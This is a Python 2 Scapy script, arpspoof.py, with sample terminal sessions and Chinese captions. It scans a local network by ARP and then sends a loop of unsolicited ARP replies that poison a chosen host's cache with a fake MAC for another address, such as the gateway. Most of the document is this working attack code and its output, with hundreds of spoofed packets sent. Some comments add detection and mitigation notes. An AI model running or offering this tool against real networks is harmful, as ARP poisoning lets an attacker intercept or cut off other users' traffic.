#!/usr/bin/python
#coding=utf-8
from scapy.all import ARP, arping, Ether, srp, send
import sys, getopt
def usage():
    """Print the two example invocations shown to the user."""
    # NOTE(review): the second example passes the spoofed address as a bare
    # argument, but the option loop in __main__ only reads it from "-p".
    for line in (
        "usage: python arpspoof.py -s 192.168.1.0/24",
        "python arpspoof.py -t 192.168.1.1 192.168.1.100",
    ):
        # A single parenthesised string prints identically under Python 2.
        print(line)
#############
# arp scan #
#############
def arpscan(Lan):
    """Broadcast ARP requests for ``Lan`` and collect the hosts that answer.

    ``Lan`` is assigned to the ARP ``pdst`` field as given; the sample runs
    that accompany this script pass a single address, a CIDR range and a
    ``*`` wildcard.

    Returns a tuple ``(flat, ip_to_mac)``:
      * ``flat`` -- list alternating IP and MAC: ``[ip0, mac0, ip1, mac1, ...]``
      * ``ip_to_mac`` -- dict mapping each answering IP to its MAC

    Only answered probes are reported; unanswered ones are discarded after
    the 2 second timeout. The MAC is copied from the reply without any
    validation, so the result reflects whatever answered on the wire.
    """
    # Every probe is addressed to the Ethernet broadcast address, so a sweep
    # is visible to each host and monitoring sensor on the segment.
    probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=Lan)
    answered, _unanswered = srp(probe, timeout=2)

    flat = []
    ip_to_mac = {}
    for sent, reply in answered:
        # pdst is read through the Ether layer of the request, as in the
        # original; hwsrc is the sender hardware address claimed by the reply.
        ip = sent[Ether].pdst
        hw = reply[ARP].hwsrc
        flat.extend((ip, hw))
        ip_to_mac[ip] = hw
    return flat, ip_to_mac
#################
# arp send #
#################
def arpsend(target, mac, host, num=-1):
    """Send ARP reply packets that bind ``host``'s IP to a fixed MAC.

    Parameters:
      target -- IP address placed in the ARP destination protocol field
      mac    -- MAC address placed in the ARP destination hardware field
      host   -- IP address placed in the ARP sender protocol field
      num    -- passed to ``send`` as ``count``; with the default -1 the
                sample runs that accompany this script keep sending until
                interrupted, and ``num=100`` sends 100 packets

    Field meanings:
      op    -- ARP packet type: 1 is a request, 2 is a reply
      pdst  -- destination protocol (IP) address
      hwdst -- destination hardware (MAC) address
      psrc  -- sender protocol (IP) address
      hwsrc -- sender hardware (MAC) address
    """
    # Detection notes for defenders: these are op=2 replies that no request
    # solicited, repeated in a loop, and the sender hardware address is the
    # constant below rather than a value read from an interface. Its first
    # octet (0xbb) has the group bit set, which a unicast sender address
    # should never have. Dynamic ARP Inspection on the switch, or static ARP
    # entries for critical hosts, stop a receiver from accepting the binding.
    reply = ARP(
        op=2,
        pdst=target,
        hwdst=mac,
        psrc=host,
        hwsrc="bb:bb:bb:cc:cc:cc",
    )
    send(reply, loop=1, count=num)
def arpauto(Lan):
    """Scan ``Lan``, list the responders and let the user pick two of them.

    The responders are printed as ``[index] MAC IP``. The user is prompted
    twice for an index: the first choice supplies ``target`` and ``mac``, the
    second supplies ``host``.

    Returns ``(target, mac, host)``.

    Raises ValueError when a prompt is answered with a non-integer and
    IndexError when the index is past the end of the scan result. Uses
    ``raw_input``, so it runs under Python 2 only.
    """
    pairs, ip_to_mac = arpscan(Lan)

    # pairs alternates IP, MAC; entry idx is (pairs[2*idx], pairs[2*idx + 1]).
    for idx in range(len(pairs) // 2):
        print("[%d] %s %s" % (idx, pairs[idx * 2 + 1], pairs[idx * 2]))

    first = int(raw_input("[Add-0]:"))
    target = pairs[first * 2]
    mac = ip_to_mac[target]
    print("%s %s %s" % ("Target0:", target, mac))

    second = int(raw_input("[Add-1]:"))
    host = pairs[second * 2]
    print("%s %s %s" % ("Target1", host, ip_to_mac[host]))

    return target, mac, host
def arpmanually(Lan):
    """Resolve one IP address to its MAC with an ARP scan.

    ``Lan`` is looked up verbatim in the scan result, so it has to be the
    single address that was scanned. Raises KeyError when that address did
    not answer.
    """
    _pairs, ip_to_mac = arpscan(Lan)
    return ip_to_mac[Lan]
# Command-line entry point: parse the options, resolve target / mac / host,
# then hand them to arpsend().
# NOTE(review): this listing lost its indentation. The nesting below is
# reconstructed from the sample runs that accompany the script, where both
# "-t ... -p ..." and "-s ..." end in arpsend() -- confirm against the
# original file.
if __name__=="__main__":
    if len(sys.argv[1:]) == 0:
        usage()
        sys.exit()
    # Always true here: the no-argument case has already exited above.
    if len(sys.argv[1:]) > 0:
        try:
            # -t, -p and -s take a value; -h and -v are flags.
            opts, args = getopt.getopt(sys.argv[1:], "ht:p:s:v", ["help", "target="])
        except getopt.GetoptError, err:
            print str(err)
            usage()
            sys.exit(2)
        for o, a in opts:
            if o in ("-h", "--help"):
                usage()
                sys.exit()
            elif o in ("-t", "--target"):
                # Manual mode: the MAC for the given IP is resolved by an ARP scan.
                target = a
                mac = arpmanually(target)
            elif o == "-v":
                print "arpspoof.py version 0.1"
                sys.exit()
            elif o == "-s":
                # Interactive mode: scan the range and prompt for both addresses.
                Lan = a
                target, mac, host = arpauto(Lan)
            # Separate "if", not part of the chain above: -p supplies the
            # address used as the ARP sender IP.
            if o == "-p":
                host = a
        # NOTE(review): target and mac are bound only by -t or -s, and host only
        # by -s or -p. Other combinations (for example -t alone, or -p alone)
        # reach this call with an unbound name and raise NameError.
        arpsend(target, mac, host)
显示帮助:
root@bt:~/Desktop# python arpspoof.py --help
WARNING: No route found for IPv6 destination :: (no default route?)
usage: python arpspoof.py -s 192.168.1.0/24
python arpspoof.py -t 192.168.1.1 192.168.1.100
命令行运行
root@bt:~/Desktop# python arpspoof.py -t 192.168.61.2 -p 192.168.61.144
WARNING: No route found for IPv6 destination :: (no default route?)
Begin emission:
*Finished to send 1 packets.
Received 1 packets, got 1 answers, remaining 0 packets
.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^C
Sent 529 packets.
支持交互命令行
root@bt:~/Desktop# python arpspoof.py -s 192.168.61.0/24
WARNING: No route found for IPv6 destination :: (no default route?)
Begin emission:
***Finished to send 256 packets.
*
Received 4 packets, got 4 answers, remaining 252 packets
[0] 00:50:56:c0:00:08 192.168.61.1
[1] 00:50:56:f8:16:3c 192.168.61.2
[2] 00:0c:29:bc:20:3b 192.168.61.144
[3] 00:50:56:e1:50:d9 192.168.61.254
[Add-0]:1
Target0: 192.168.61.2 00:50:56:f8:16:3c
[Add-1]:2
Target1 192.168.61.144 00:0c:29:bc:20:3b
.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................^C
Sent 461 packets.
作为 Python 模块导入
root@bt:~/Desktop# python
Python 2.6.5 (r265:79063, Apr 16 2010, 13:09:56)
[GCC 4.4.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import arpspoof
WARNING: No route found for IPv6 destination :: (no default route?)
>>> s, d = arpspoof.arpscan("192.168.61.*")
Begin emission:
***Finished to send 256 packets.
*
Received 4 packets, got 4 answers, remaining 252 packets
>>> print s,"\n",d
['192.168.61.1', '00:50:56:c0:00:08', '192.168.61.2', '00:50:56:f8:16:3c', '192.168.61.144', '00:0c:29:bc:20:3b', '192.168.61.254', '00:50:56:e1:50:d9']
{'192.168.61.254': '00:50:56:e1:50:d9', '192.168.61.1': '00:50:56:c0:00:08', '192.168.61.2': '00:50:56:f8:16:3c', '192.168.61.144': '00:0c:29:bc:20:3b'}
>>> arpspoof.arpsend(target="192.168.61.144",mac="00:0c:29:bc:20:3b",host="192.168.61.2")
....................................................................................................................................................................................................................................................................................................................................................................^C
Sent 680 packets.
>>> arpspoof.arpsend(target="192.168.61.144",mac="00:0c:29:bc:20:3b",host="192.168.61.2",num=100)
....................................................................................................
Sent 100 packets.
此工具仅供学习,不得用于非法用途:
上两张测试图: